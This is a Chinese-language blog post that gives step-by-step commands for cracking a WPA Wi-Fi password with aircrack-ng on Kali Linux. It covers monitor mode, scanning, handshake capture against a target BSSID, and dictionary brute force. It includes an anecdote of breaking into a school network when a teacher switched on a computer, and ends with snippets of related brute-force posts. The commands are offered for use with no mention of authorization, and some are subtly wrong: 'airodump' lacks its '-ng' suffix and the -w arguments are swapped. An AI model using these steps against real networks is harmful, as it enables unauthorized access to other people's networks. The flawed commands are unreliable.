aircrack ng暴力破解無線密碼攻略

2021-08-03 03:32:40 字數 604 閱讀 9134

準備

其實使用的aircrack-ng(對無線網進行滲透測試的工具,但是大神已經把很多安全滲透以及其他的黑客工具都預裝在了linux系統中)

(筆記本的網絡卡在虛擬機器中會被視為一般網絡卡,所以把kali系統直接裝在你的電腦上。裝的時候,會有探測裝載光碟機失敗,把u盤拔了重新插上就可以了,很玄學)

(一般root使用者直接輸入文章中的命令就可以了。但是非root使用者要在命令前加sudo,提公升你的許可權)

將無線網絡卡設定成監聽模式

iwconfig

ifconfig wlan0 up

airmon-ng start wlan0

檢測周圍網路,獲取你攻擊的網路mac位址,通道

airodump-ng wlan0mon

抓包,直到螢幕出現wpa handshake,資料才獲取成功。

airodump --bssid 要攻擊的mac -c 通道號(ch) -w 抓下來的包檔名 監聽模式的網絡卡

我們破解的時候,是課間,老師電腦是關閉的,一直沒有握手成功,然後上課老師進來開啟了他的電腦(資料傳輸被獲取到了),哈,立馬就成功了。

利用包檔案和密碼字典進行破解

aircrack-ng -w 包檔案 密碼字典

Kali Linux WiFi暴力破解 詳細無失誤

需要乙個支援監聽模式的網絡卡 先檢視一下usb網絡卡是否連線到虛擬機器 airmon ng 檢視網絡卡是否在監聽模式顯示wlan0說明不在監聽模式 airmon ng start wlan0 開啟監聽模式ifconfig 顯示wlan0mon表示以在監聽模式airodump ng wlan0mon ...

medusa 暴力破解

medusa 美杜莎 和hydra 九頭蛇 差不多 科普下 medusa是支援afp,cvs,ftp,http,imap,ms sql,mysql,ncp netware nntp,pcanywhere,pop3,postgresql,rexec,rlogin,rsh,smb,smtp auth v...

DVWA Brute Force(暴力破解)

本系列文集 dvwa學習筆記 分析 isset函式在php中用來檢測變數是否設定 該函式返回的是布林型別的值,即true false 可以看到,伺服器只是驗證了引數login是否被設定,沒有任何的防爆破機制,且對引數username password沒有做任何過濾,存在明顯的sql注入漏洞。方法一利...